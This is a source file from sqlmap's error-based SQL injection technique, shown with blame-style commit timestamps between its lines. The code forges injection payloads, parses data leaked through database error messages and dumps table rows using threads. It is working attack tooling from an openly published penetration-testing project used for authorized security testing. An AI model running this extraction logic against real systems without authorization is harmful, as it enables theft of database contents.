2019-05-08 13:47:52 +03:00
#!/usr/bin/env python
2010-10-20 13:09:04 +04:00
"""
2019-01-05 23:38:52 +03:00
Copyright ( c ) 2006 - 2019 sqlmap developers ( http : / / sqlmap . org / )
2017-10-11 15:50:46 +03:00
See the file ' LICENSE ' for copying permission
2010-10-20 13:09:04 +04:00
"""
2019-01-22 03:28:24 +03:00
from __future__ import print_function
2010-10-20 13:09:04 +04:00
import re
import time
2012-02-22 14:40:11 +04:00
from extra . safe2bin . safe2bin import safecharencode
2010-10-20 13:09:04 +04:00
from lib . core . agent import agent
2012-02-16 13:46:41 +04:00
from lib . core . bigarray import BigArray
2011-01-31 15:21:17 +03:00
from lib . core . common import Backend
2011-01-19 02:02:11 +03:00
from lib . core . common import calculateDeltaSeconds
2011-02-12 23:03:28 +03:00
from lib . core . common import dataToStdout
2019-05-03 14:20:15 +03:00
from lib . core . common import decodeDbmsHexValue
2010-12-06 10:48:14 +03:00
from lib . core . common import extractRegexResult
2018-07-27 01:53:14 +03:00
from lib . core . common import firstNotNone
2016-05-25 13:42:15 +03:00
from lib . core . common import getConsoleWidth
2013-02-03 15:31:05 +04:00
from lib . core . common import getPartRun
2012-02-24 17:07:20 +04:00
from lib . core . common import hashDBRetrieve
from lib . core . common import hashDBWrite
2011-12-21 15:50:49 +04:00
from lib . core . common import incrementCounter
2010-12-18 12:51:34 +03:00
from lib . core . common import initTechnique
2012-06-14 17:38:53 +04:00
from lib . core . common import isListLike
2011-01-19 02:02:11 +03:00
from lib . core . common import isNumPosStrValue
2011-01-31 15:21:17 +03:00
from lib . core . common import listToStrValue
2011-12-23 00:42:57 +04:00
from lib . core . common import readInput
2012-12-30 14:10:32 +04:00
from lib . core . common import unArrayizeValue
2017-05-17 01:22:18 +03:00
from lib . core . common import wasLastResponseHTTPError
2019-03-28 18:04:38 +03:00
from lib . core . compat import xrange
2019-05-03 14:20:15 +03:00
from lib . core . convert import decodeHex
2019-05-06 01:54:21 +03:00
from lib . core . convert import getUnicode
2019-05-20 12:24:43 +03:00
from lib . core . convert import htmlUnescape
2010-10-20 13:09:04 +04:00
from lib . core . data import conf
from lib . core . data import kb
from lib . core . data import logger
from lib . core . data import queries
2012-08-21 13:19:15 +04:00
from lib . core . dicts import FROM_DUMMY_TABLE
2010-11-08 12:20:02 +03:00
from lib . core . enums import DBMS
2015-08-26 16:26:16 +03:00
from lib . core . enums import HASHDB_KEYS
2014-08-27 01:36:04 +04:00
from lib . core . enums import HTTP_HEADER
2015-11-20 13:32:54 +03:00
from lib . core . exception import SqlmapDataException
2012-07-12 16:31:28 +04:00
from lib . core . settings import CHECK_ZERO_COLUMNS_THRESHOLD
2015-08-26 16:26:16 +03:00
from lib . core . settings import MIN_ERROR_CHUNK_LENGTH
from lib . core . settings import MAX_ERROR_CHUNK_LENGTH
2012-07-12 16:31:28 +04:00
from lib . core . settings import NULL
2012-07-06 17:36:32 +04:00
from lib . core . settings import PARTIAL_VALUE_MARKER
2016-05-25 13:50:53 +03:00
from lib . core . settings import ROTATING_CHARS
2011-12-23 00:42:57 +04:00
from lib . core . settings import SLOW_ORDER_COUNT_THRESHOLD
2011-05-19 20:45:05 +04:00
from lib . core . settings import SQL_SCALAR_REGEX
2011-04-22 23:58:10 +04:00
from lib . core . settings import TURN_OFF_RESUME_INFO_LIMIT
2011-03-17 12:12:28 +03:00
from lib . core . threads import getCurrentThreadData
2011-05-30 03:17:50 +04:00
from lib . core . threads import runThreads
2010-10-20 13:09:04 +04:00
from lib . core . unescaper import unescaper
from lib . request . connect import Connect as Request
2013-05-13 16:50:03 +04:00
from lib . utils . progress import ProgressBar
2019-03-28 15:53:54 +03:00
from thirdparty import six
2010-10-20 13:09:04 +04:00
2015-08-26 16:26:16 +03:00
def _oneShotErrorUse ( expression , field = None , chunkTest = False ) :
2012-07-06 17:36:32 +04:00
offset = 1
2016-05-25 13:50:53 +03:00
rotator = 0
2012-07-06 17:36:32 +04:00
partialValue = None
threadData = getCurrentThreadData ( )
2012-02-24 18:54:10 +04:00
retVal = hashDBRetrieve ( expression , checkConf = True )
2011-09-26 00:36:32 +04:00
2012-07-06 17:36:32 +04:00
if retVal and PARTIAL_VALUE_MARKER in retVal :
partialValue = retVal = retVal . replace ( PARTIAL_VALUE_MARKER , " " )
2012-12-17 17:30:21 +04:00
logger . info ( " resuming partial value: ' %s ' " % _formatPartialContent ( partialValue ) )
2012-07-06 17:36:32 +04:00
offset + = len ( partialValue )
2011-10-12 02:40:00 +04:00
2012-07-06 17:36:32 +04:00
threadData . resumed = retVal is not None and not partialValue
2012-07-12 16:31:28 +04:00
2015-08-26 16:26:16 +03:00
if any ( Backend . isDbms ( dbms ) for dbms in ( DBMS . MYSQL , DBMS . MSSQL ) ) and kb . errorChunkLength is None and not chunkTest and not kb . testMode :
debugMsg = " searching for error chunk length... "
logger . debug ( debugMsg )
current = MAX_ERROR_CHUNK_LENGTH
while current > = MIN_ERROR_CHUNK_LENGTH :
testChar = str ( current % 10 )
2017-12-20 16:51:15 +03:00
testQuery = " %s ( ' %s ' , %d ) " % ( " REPEAT " if Backend . isDbms ( DBMS . MYSQL ) else " REPLICATE " , testChar , current )
testQuery = " SELECT %s " % ( agent . hexConvertField ( testQuery ) if conf . hexConvert else testQuery )
2015-08-26 16:26:16 +03:00
result = unArrayizeValue ( _oneShotErrorUse ( testQuery , chunkTest = True ) )
2016-01-08 12:45:31 +03:00
2016-01-11 01:12:46 +03:00
if ( result or " " ) . startswith ( testChar ) :
2015-08-26 16:26:16 +03:00
if result == testChar * current :
kb . errorChunkLength = current
break
else :
2016-01-08 12:45:31 +03:00
result = re . search ( r " \ A \ w+ " , result ) . group ( 0 )
candidate = len ( result ) - len ( kb . chars . stop )
current = candidate if candidate != current else current - 1
2015-08-26 16:26:16 +03:00
else :
2019-01-22 04:29:52 +03:00
current = current / / 2
2015-08-26 16:26:16 +03:00
if kb . errorChunkLength :
hashDBWrite ( HASHDB_KEYS . KB_ERROR_CHUNK_LENGTH , kb . errorChunkLength )
else :
kb . errorChunkLength = 0
2011-02-08 19:23:33 +03:00
2012-07-06 17:36:32 +04:00
if retVal is None or partialValue :
try :
while True :
2017-05-17 01:22:18 +03:00
check = r " (?si) %s (?P<result>.*?) %s " % ( kb . chars . start , kb . chars . stop )
2018-07-27 01:53:14 +03:00
trimCheck = r " (?si) %s (?P<result>[^< \ n]*) " % kb . chars . start
2012-07-06 17:36:32 +04:00
2012-07-12 16:31:28 +04:00
if field :
nulledCastedField = agent . nullAndCastField ( field )
2012-07-06 17:36:32 +04:00
2015-08-26 16:26:16 +03:00
if any ( Backend . isDbms ( dbms ) for dbms in ( DBMS . MYSQL , DBMS . MSSQL ) ) and not any ( _ in field for _ in ( " COUNT " , " CASE " ) ) and kb . errorChunkLength and not chunkTest :
2012-11-29 13:51:59 +04:00
extendedField = re . search ( r " [^ ,]* %s [^ ,]* " % re . escape ( field ) , expression ) . group ( 0 )
if extendedField != field : # e.g. MIN(surname)
nulledCastedField = extendedField . replace ( field , nulledCastedField )
field = extendedField
2015-08-26 16:26:16 +03:00
nulledCastedField = queries [ Backend . getIdentifiedDbms ( ) ] . substring . query % ( nulledCastedField , offset , kb . errorChunkLength )
2012-07-06 17:36:32 +04:00
# Forge the error-based SQL injection request
2012-12-05 13:45:17 +04:00
vector = kb . injection . data [ kb . technique ] . vector
2012-07-06 17:36:32 +04:00
query = agent . prefixQuery ( vector )
query = agent . suffixQuery ( query )
2012-07-12 16:31:28 +04:00
injExpression = expression . replace ( field , nulledCastedField , 1 ) if field else expression
2013-01-18 18:40:37 +04:00
injExpression = unescaper . escape ( injExpression )
2012-07-06 17:36:32 +04:00
injExpression = query . replace ( " [QUERY] " , injExpression )
payload = agent . payload ( newValue = injExpression )
# Perform the request
2017-06-05 17:28:19 +03:00
page , headers , _ = Request . queryPage ( payload , content = True , raise404 = False )
2012-07-06 17:36:32 +04:00
2012-12-05 13:45:17 +04:00
incrementCounter ( kb . technique )
2012-07-06 17:36:32 +04:00
2014-08-27 01:36:04 +04:00
if page and conf . noEscape :
2014-07-14 23:10:45 +04:00
page = re . sub ( r " ( ' | \ %% 27) %s ( ' | \ %% 27).*?( ' | \ %% 27) %s ( ' | \ %% 27) " % ( kb . chars . start , kb . chars . stop ) , " " , page )
2014-07-11 18:24:57 +04:00
2012-07-06 17:36:32 +04:00
# Parse the returned page to get the exact error-based
# SQL injection output
2018-07-27 01:53:14 +03:00
output = firstNotNone (
2018-03-13 15:45:42 +03:00
extractRegexResult ( check , page ) ,
extractRegexResult ( check , threadData . lastHTTPError [ 2 ] if wasLastResponseHTTPError ( ) else None ) ,
extractRegexResult ( check , listToStrValue ( ( headers [ header ] for header in headers if header . lower ( ) != HTTP_HEADER . URI . lower ( ) ) if headers else None ) ) ,
2018-07-27 01:53:14 +03:00
extractRegexResult ( check , threadData . lastRedirectMsg [ 1 ] if threadData . lastRedirectMsg and threadData . lastRedirectMsg [ 0 ] == threadData . lastRequestUID else None )
2018-03-13 15:45:42 +03:00
)
2012-07-06 17:36:32 +04:00
if output is not None :
2012-12-11 15:02:06 +04:00
output = getUnicode ( output )
2011-09-26 00:36:32 +04:00
else :
2018-07-27 01:53:14 +03:00
trimmed = firstNotNone (
extractRegexResult ( trimCheck , page ) ,
extractRegexResult ( trimCheck , threadData . lastHTTPError [ 2 ] if wasLastResponseHTTPError ( ) else None ) ,
extractRegexResult ( trimCheck , listToStrValue ( ( headers [ header ] for header in headers if header . lower ( ) != HTTP_HEADER . URI . lower ( ) ) if headers else None ) ) ,
extractRegexResult ( trimCheck , threadData . lastRedirectMsg [ 1 ] if threadData . lastRedirectMsg and threadData . lastRedirectMsg [ 0 ] == threadData . lastRequestUID else None )
2018-03-13 15:45:42 +03:00
)
2012-07-06 17:36:32 +04:00
if trimmed :
2015-08-26 16:26:16 +03:00
if not chunkTest :
warnMsg = " possible server trimmed output detected "
warnMsg + = " (due to its length and/or content): "
warnMsg + = safecharencode ( trimmed )
logger . warn ( warnMsg )
2012-07-06 17:36:32 +04:00
2014-11-05 12:46:11 +03:00
if not kb . testMode :
2016-01-11 01:07:11 +03:00
check = r " (?P<result>[^<> \ n]*?) %s " % kb . chars . stop [ : 2 ]
2014-11-05 12:46:11 +03:00
output = extractRegexResult ( check , trimmed , re . IGNORECASE )
2014-12-10 08:37:17 +03:00
if not output :
2018-07-27 01:53:14 +03:00
check = r " (?P<result>[^ \ s<> ' \" ]+) "
2014-12-10 08:37:17 +03:00
output = extractRegexResult ( check , trimmed , re . IGNORECASE )
else :
output = output . rstrip ( )
2012-07-06 17:36:32 +04:00
if any ( Backend . isDbms ( dbms ) for dbms in ( DBMS . MYSQL , DBMS . MSSQL ) ) :
if offset == 1 :
retVal = output
else :
retVal + = output if output else ' '
2015-08-26 16:26:16 +03:00
if output and kb . errorChunkLength and len ( output ) > = kb . errorChunkLength and not chunkTest :
offset + = kb . errorChunkLength
2012-07-06 17:36:32 +04:00
else :
break
2017-04-20 11:48:04 +03:00
if output and conf . verbose in ( 1 , 2 ) and not conf . api :
2016-05-25 13:50:53 +03:00
if kb . fileReadMode :
dataToStdout ( _formatPartialContent ( output ) . replace ( r " \ n " , " \n " ) . replace ( r " \ t " , " \t " ) )
elif offset > 1 :
rotator + = 1
if rotator > = len ( ROTATING_CHARS ) :
rotator = 0
dataToStdout ( " \r %s \r " % ROTATING_CHARS [ rotator ] )
2011-09-26 00:36:32 +04:00
else :
2012-07-06 17:36:32 +04:00
retVal = output
2011-09-26 00:36:32 +04:00
break
2012-07-06 17:36:32 +04:00
except :
2013-02-04 19:37:54 +04:00
if retVal is not None :
hashDBWrite ( expression , " %s %s " % ( retVal , PARTIAL_VALUE_MARKER ) )
2012-07-06 17:36:32 +04:00
raise
2010-10-26 13:33:18 +04:00
2019-05-03 14:20:15 +03:00
retVal = decodeDbmsHexValue ( retVal ) if conf . hexConvert else retVal
2012-02-21 15:44:48 +04:00
2019-03-28 15:53:54 +03:00
if isinstance ( retVal , six . string_types ) :
2019-05-20 12:24:43 +03:00
retVal = htmlUnescape ( retVal ) . replace ( " <br> " , " \n " )
2011-05-04 01:12:51 +04:00
2012-12-06 17:14:19 +04:00
retVal = _errorReplaceChars ( retVal )
2011-03-21 16:13:12 +03:00
2013-02-04 19:37:54 +04:00
if retVal is not None :
hashDBWrite ( expression , retVal )
2010-10-20 13:09:04 +04:00
2011-12-22 16:20:21 +04:00
else :
2017-05-17 01:22:18 +03:00
_ = " (?si) %s (?P<result>.*?) %s " % ( kb . chars . start , kb . chars . stop )
retVal = extractRegexResult ( _ , retVal ) or retVal
2011-12-22 16:20:21 +04:00
2011-07-26 00:40:31 +04:00
return safecharencode ( retVal ) if kb . safeCharEncode else retVal
2011-01-19 02:02:11 +03:00
2013-05-09 18:23:57 +04:00
def _errorFields ( expression , expressionFields , expressionFieldsList , num = None , emptyFields = None , suppressOutput = False ) :
2012-12-20 14:06:52 +04:00
values = [ ]
2011-01-19 02:02:11 +03:00
origExpr = None
2016-05-25 13:42:15 +03:00
width = getConsoleWidth ( )
2011-10-12 02:40:00 +04:00
threadData = getCurrentThreadData ( )
2011-01-19 02:02:11 +03:00
for field in expressionFieldsList :
output = None
if field . startswith ( " ROWNUM " ) :
continue
if isinstance ( num , int ) :
origExpr = expression
2011-02-07 19:24:23 +03:00
expression = agent . limitQuery ( num , expression , field , expressionFieldsList [ 0 ] )
2011-01-19 02:02:11 +03:00
if " ROWNUM " in expressionFieldsList :
expressionReplaced = expression
else :
expressionReplaced = expression . replace ( expressionFields , field , 1 )
2012-12-06 17:14:19 +04:00
output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse ( expressionReplaced , field )
2011-01-19 02:02:11 +03:00
2012-02-17 18:22:48 +04:00
if not kb . threadContinue :
return None
2011-02-01 00:13:29 +03:00
2013-05-09 18:23:57 +04:00
if not suppressOutput :
if kb . fileReadMode and output and output . strip ( ) :
2019-01-22 03:28:24 +03:00
print ( )
2013-05-09 18:23:57 +04:00
elif output is not None and not ( threadData . resumed and kb . suppressResumeInfo ) and not ( emptyFields and field in emptyFields ) :
2018-12-17 17:15:54 +03:00
status = " [ %s ] [INFO] %s : ' %s ' " % ( time . strftime ( " %X " ) , " resumed " if threadData . resumed else " retrieved " , output if kb . safeCharEncode else safecharencode ( output ) )
2016-05-25 13:42:15 +03:00
if len ( status ) > width :
status = " %s ... " % status [ : width - 3 ]
2016-06-01 14:39:40 +03:00
dataToStdout ( " %s \n " % status )
2011-01-19 02:02:11 +03:00
if isinstance ( num , int ) :
expression = origExpr
2012-12-20 14:06:52 +04:00
values . append ( output )
2011-01-19 02:02:11 +03:00
2012-12-20 14:06:52 +04:00
return values
2011-01-19 02:02:11 +03:00
2012-12-06 17:14:19 +04:00
def _errorReplaceChars ( value ) :
2011-03-21 16:13:12 +03:00
"""
Restores safely replaced characters
"""
retVal = value
if value :
2012-03-01 15:59:37 +04:00
retVal = retVal . replace ( kb . chars . space , " " ) . replace ( kb . chars . dollar , " $ " ) . replace ( kb . chars . at , " @ " ) . replace ( kb . chars . hash_ , " # " )
2011-03-21 16:13:12 +03:00
return retVal
2012-12-06 17:14:19 +04:00
def _formatPartialContent ( value ) :
2012-07-06 17:36:32 +04:00
"""
2012-12-19 04:46:23 +04:00
Prepares ( possibly hex - encoded ) partial content for safe console output
2012-07-06 17:36:32 +04:00
"""
2019-03-28 15:53:54 +03:00
if value and isinstance ( value , six . string_types ) :
2012-07-06 17:36:32 +04:00
try :
2019-05-03 14:20:15 +03:00
value = decodeHex ( value , binary = False )
2012-07-06 17:36:32 +04:00
except :
pass
finally :
value = safecharencode ( value )
2012-12-19 04:46:23 +04:00
2012-07-06 17:36:32 +04:00
return value
2012-07-12 18:38:43 +04:00
def errorUse ( expression , dump = False ) :
2011-01-19 02:02:11 +03:00
"""
Retrieve the output of a SQL query taking advantage of the error - based
SQL injection vulnerability on the affected parameter .
"""
2012-12-05 13:45:17 +04:00
initTechnique ( kb . technique )
2011-01-19 02:02:11 +03:00
2012-02-03 14:38:04 +04:00
abortedFlag = False
2011-01-19 02:02:11 +03:00
count = None
2012-07-12 16:31:28 +04:00
emptyFields = [ ]
2011-01-19 02:02:11 +03:00
start = time . time ( )
startLimit = 0
stopLimit = None
2012-12-20 14:06:52 +04:00
value = None
2011-01-19 02:02:11 +03:00
_ , _ , _ , _ , _ , expressionFieldsList , expressionFields , _ = agent . getFields ( expression )
2013-02-03 15:31:05 +04:00
# Set kb.partRun in case the engine is called from the API
2017-04-10 20:21:22 +03:00
kb . partRun = getPartRun ( alias = False ) if conf . api else None
2013-02-03 15:31:05 +04:00
2011-01-19 02:02:11 +03:00
# We have to check if the SQL query might return multiple entries
# and in such case forge the SQL limiting the query output one
2012-12-19 16:17:56 +04:00
# entry at a time
# NOTE: we assume that only queries that get data from a table can
2011-01-19 02:02:11 +03:00
# return multiple entries
2018-03-13 15:45:42 +03:00
if ( dump and ( conf . limitStart or conf . limitStop ) ) or ( " FROM " in expression . upper ( ) and ( ( Backend . getIdentifiedDbms ( ) not in FROM_DUMMY_TABLE ) or ( Backend . getIdentifiedDbms ( ) in FROM_DUMMY_TABLE and not expression . upper ( ) . endswith ( FROM_DUMMY_TABLE [ Backend . getIdentifiedDbms ( ) ] ) ) ) and ( " (CASE " not in expression . upper ( ) or ( " (CASE " in expression . upper ( ) and " WHEN use " in expression ) ) ) and not re . search ( SQL_SCALAR_REGEX , expression , re . I ) :
2012-12-19 16:17:56 +04:00
expression , limitCond , topLimit , startLimit , stopLimit = agent . limitCondition ( expression , dump )
2011-02-02 01:07:42 +03:00
2011-01-19 02:02:11 +03:00
if limitCond :
2011-02-02 01:07:42 +03:00
# Count the number of SQL query entries output
2012-11-15 18:06:54 +04:00
countedExpression = expression . replace ( expressionFields , queries [ Backend . getIdentifiedDbms ( ) ] . count . query % ( ' * ' if len ( expressionFieldsList ) > 1 else expressionFields ) , 1 )
2011-01-19 02:02:11 +03:00
2014-12-12 16:54:47 +03:00
if " ORDER BY " in countedExpression . upper ( ) :
2012-12-19 15:40:00 +04:00
_ = countedExpression . upper ( ) . rindex ( " ORDER BY " )
countedExpression = countedExpression [ : _ ]
2011-01-19 02:02:11 +03:00
2012-02-17 18:22:48 +04:00
_ , _ , _ , _ , _ , _ , countedExpressionFields , _ = agent . getFields ( countedExpression )
2012-12-30 14:10:32 +04:00
count = unArrayizeValue ( _oneShotErrorUse ( countedExpression , countedExpressionFields ) )
2011-01-19 02:02:11 +03:00
2011-05-12 15:52:18 +04:00
if isNumPosStrValue ( count ) :
2011-02-02 01:07:42 +03:00
if isinstance ( stopLimit , int ) and stopLimit > 0 :
stopLimit = min ( int ( count ) , int ( stopLimit ) )
else :
stopLimit = int ( count )
2011-01-19 02:02:11 +03:00
2017-12-04 15:59:35 +03:00
infoMsg = " used SQL query returns "
2018-12-04 00:59:46 +03:00
infoMsg + = " %d %s " % ( stopLimit , " entries " if stopLimit > 1 else " entry " )
2011-02-02 01:07:42 +03:00
logger . info ( infoMsg )
2011-02-01 00:13:29 +03:00
2011-08-02 12:39:32 +04:00
elif count and not count . isdigit ( ) :
2011-05-12 15:52:18 +04:00
warnMsg = " it was not possible to count the number "
2011-08-02 12:39:32 +04:00
warnMsg + = " of entries for the SQL query provided. "
2011-05-12 15:52:18 +04:00
warnMsg + = " sqlmap will assume that it returns only "
warnMsg + = " one entry "
logger . warn ( warnMsg )
stopLimit = 1
2011-08-02 12:39:32 +04:00
elif ( not count or int ( count ) == 0 ) :
2012-01-07 21:45:45 +04:00
if not count :
warnMsg = " the SQL query provided does not "
warnMsg + = " return any output "
logger . warn ( warnMsg )
2012-05-09 14:34:21 +04:00
else :
2012-12-20 14:06:52 +04:00
value = [ ] # for empty tables
return value
2011-08-02 12:39:32 +04:00
2017-06-07 12:22:06 +03:00
if isNumPosStrValue ( count ) and int ( count ) > 1 :
if " ORDER BY " in expression and ( stopLimit - startLimit ) > SLOW_ORDER_COUNT_THRESHOLD :
message = " due to huge table size do you want to remove "
message + = " ORDER BY clause gaining speed over consistency? [y/N] "
if readInput ( message , default = " N " , boolean = True ) :
expression = expression [ : expression . index ( " ORDER BY " ) ]
numThreads = min ( conf . threads , ( stopLimit - startLimit ) )
threadData = getCurrentThreadData ( )
try :
threadData . shared . limits = iter ( xrange ( startLimit , stopLimit ) )
except OverflowError :
errMsg = " boundary limits ( %d , %d ) are too large. Please rerun " % ( startLimit , stopLimit )
errMsg + = " with switch ' --fresh-queries ' "
raise SqlmapDataException ( errMsg )
threadData . shared . value = BigArray ( )
threadData . shared . buffered = [ ]
threadData . shared . counter = 0
threadData . shared . lastFlushed = startLimit - 1
threadData . shared . showEta = conf . eta and ( stopLimit - startLimit ) > 1
if threadData . shared . showEta :
threadData . shared . progress = ProgressBar ( maxValue = ( stopLimit - startLimit ) )
if kb . dumpTable and ( len ( expressionFieldsList ) < ( stopLimit - startLimit ) > CHECK_ZERO_COLUMNS_THRESHOLD ) :
for field in expressionFieldsList :
if _oneShotErrorUse ( " SELECT COUNT( %s ) FROM %s " % ( field , kb . dumpTable ) ) == ' 0 ' :
emptyFields . append ( field )
debugMsg = " column ' %s ' of table ' %s ' will not be " % ( field , kb . dumpTable )
debugMsg + = " dumped as it appears to be empty "
logger . debug ( debugMsg )
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT :
kb . suppressResumeInfo = True
debugMsg = " suppressing possible resume console info because of "
debugMsg + = " large number of rows. It might take too long "
logger . debug ( debugMsg )
try :
def errorThread ( ) :
threadData = getCurrentThreadData ( )
while kb . threadContinue :
with kb . locks . limit :
try :
threadData . shared . counter + = 1
2019-01-22 04:47:06 +03:00
num = next ( threadData . shared . limits )
2017-06-07 12:22:06 +03:00
except StopIteration :
break
2011-06-07 13:50:00 +04:00
2017-06-07 12:22:06 +03:00
output = _errorFields ( expression , expressionFields , expressionFieldsList , num , emptyFields , threadData . shared . showEta )
2011-06-07 13:50:00 +04:00
2017-06-07 12:22:06 +03:00
if not kb . threadContinue :
break
2011-06-07 13:50:00 +04:00
2017-06-07 12:22:06 +03:00
if output and isListLike ( output ) and len ( output ) == 1 :
2018-05-08 12:59:56 +03:00
output = unArrayizeValue ( output )
2017-06-07 12:22:06 +03:00
with kb . locks . value :
index = None
if threadData . shared . showEta :
2018-07-05 16:13:51 +03:00
threadData . shared . progress . progress ( threadData . shared . counter )
2017-06-07 12:22:06 +03:00
for index in xrange ( 1 + len ( threadData . shared . buffered ) ) :
if index < len ( threadData . shared . buffered ) and threadData . shared . buffered [ index ] [ 0 ] > = num :
break
threadData . shared . buffered . insert ( index or 0 , ( num , output ) )
while threadData . shared . buffered and threadData . shared . lastFlushed + 1 == threadData . shared . buffered [ 0 ] [ 0 ] :
threadData . shared . lastFlushed + = 1
threadData . shared . value . append ( threadData . shared . buffered [ 0 ] [ 1 ] )
del threadData . shared . buffered [ 0 ]
runThreads ( numThreads , errorThread )
except KeyboardInterrupt :
abortedFlag = True
warnMsg = " user aborted during enumeration. sqlmap "
warnMsg + = " will display partial output "
logger . warn ( warnMsg )
2011-01-19 02:02:11 +03:00
2017-06-07 12:22:06 +03:00
finally :
threadData . shared . value . extend ( _ [ 1 ] for _ in sorted ( threadData . shared . buffered ) )
value = threadData . shared . value
kb . suppressResumeInfo = False
2011-04-22 23:58:10 +04:00
2012-12-20 14:06:52 +04:00
if not value and not abortedFlag :
value = _errorFields ( expression , expressionFields , expressionFieldsList )
2011-02-01 00:13:29 +03:00
2018-12-04 01:07:13 +03:00
if value and isListLike ( value ) :
2019-03-28 15:53:54 +03:00
if len ( value ) == 1 and isinstance ( value [ 0 ] , six . string_types ) :
2018-12-04 01:07:13 +03:00
value = unArrayizeValue ( value )
elif len ( value ) > 1 and stopLimit == 1 :
value = [ value ]
2011-01-19 02:02:11 +03:00
2011-02-02 01:07:42 +03:00
duration = calculateDeltaSeconds ( start )
2011-04-08 15:02:21 +04:00
if not kb . bruteMode :
2013-05-28 16:40:45 +04:00
debugMsg = " performed %d queries in %.2f seconds " % ( kb . counters [ kb . technique ] , duration )
2011-04-08 15:02:21 +04:00
logger . debug ( debugMsg )
2011-02-02 01:07:42 +03:00
2012-12-20 14:06:52 +04:00
return value